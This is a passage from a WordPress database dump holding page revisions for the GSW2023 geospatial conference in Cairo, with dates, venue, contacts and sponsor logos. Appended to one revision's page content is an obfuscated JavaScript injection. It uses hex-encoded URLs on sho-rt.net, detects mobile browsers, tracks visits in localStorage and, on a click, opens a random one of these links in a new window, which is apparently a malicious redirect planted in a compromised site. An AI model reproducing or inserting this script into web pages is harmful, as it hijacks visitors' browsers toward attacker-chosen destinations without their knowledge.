bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][vc_column_text][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<ul>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n<p>[/ultimate_heading][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-30 17:19:15','2023-08-30 17:19:15','',3066,'https://gsw2023.com/?p=5439',0,'revision','',0);
INSERT INTO `dnctiavkr_posts` VALUES
(5440,1,'2023-08-30 17:22:33','2023-08-30 17:22:33','<p><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row]<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\r\n<h3 style=\"text-align: center;\"></h3>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" 